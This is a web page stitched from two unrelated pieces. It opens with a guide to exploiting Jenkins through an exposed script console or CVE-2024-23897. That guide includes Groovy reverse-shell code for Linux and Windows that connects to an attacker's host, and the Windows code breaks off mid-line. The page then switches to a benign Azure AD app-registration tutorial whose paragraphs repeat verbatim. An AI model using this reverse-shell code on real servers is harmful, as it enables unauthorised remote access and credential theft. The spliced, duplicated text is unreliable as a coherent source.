Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
When you register an application in Azure AD , you need to specify the application details and the permission details that the application should have when it access the Azure Services.
The application can authenticate through the Microsoft Identity platform. The Microsoft Identity platform uses OAuth 2.0 authorization service that enables a third-party application to access web-hosted resources. Once the application object is registered in Azure AD, it is called as a service principle.
When you register an application in Azure AD, you need to keep note of two things.
1) Application or Client Identity.
2) Directory or Tenant ID.
The application can authenticate through the Microsoft Identity platform. The Microsoft Identity platform uses OAuth 2.0 authorization service that enables a third-party application to access web-hosted resources. Once the application object is registered in Azure AD, it is called as a service principle.
When you register an application in Azure AD, you need to keep note of two things.
1) Application or Client Identity.
2) Directory or Tenant ID.
These ID's are automatically generated during the application registration. Normally, these two information are required to be specified at the application end.
After the registration, you may required to generate a client secret and that can be done from the AD -> Certificates & Secrets section. Note that once the secret is generated, you must copy the code somewhere secure (for example, your key vault). The moment you leaves the Certificates & Secrets page, you won't be able to see the generated secret again.
The final things that you may need to perform during the application registration process is, Configuring the API permission. (Under AD-> API permissions)
The Microsoft Identity platform supports the following permission types
Delegated permissions - Use this option when the applications have a signed-in user. The application is then delegated permissions to act on behalf of the signed-in user to make calls to a target resource.
Application permissions - These are applications that run without a signed-in user.
After the registration, you may required to generate a client secret and that can be done from the AD -> Certificates & Secrets section. Note that once the secret is generated, you must copy the code somewhere secure (for example, your key vault). The moment you leaves the Certificates & Secrets page, you won't be able to see the generated secret again.
The final things that you may need to perform during the application registration process is, Configuring the API permission. (Under AD-> API permissions)
The Microsoft Identity platform supports the following permission types
Delegated permissions - Use this option when the applications have a signed-in user. The application is then delegated permissions to act on behalf of the signed-in user to make calls to a target resource.
Application permissions - These are applications that run without a signed-in user.
Finally, Grant Admin consent after creating the permission.
These are the major tasks that's needs to be performed in the Azure cloud, for registering an application in Azure Active Directory.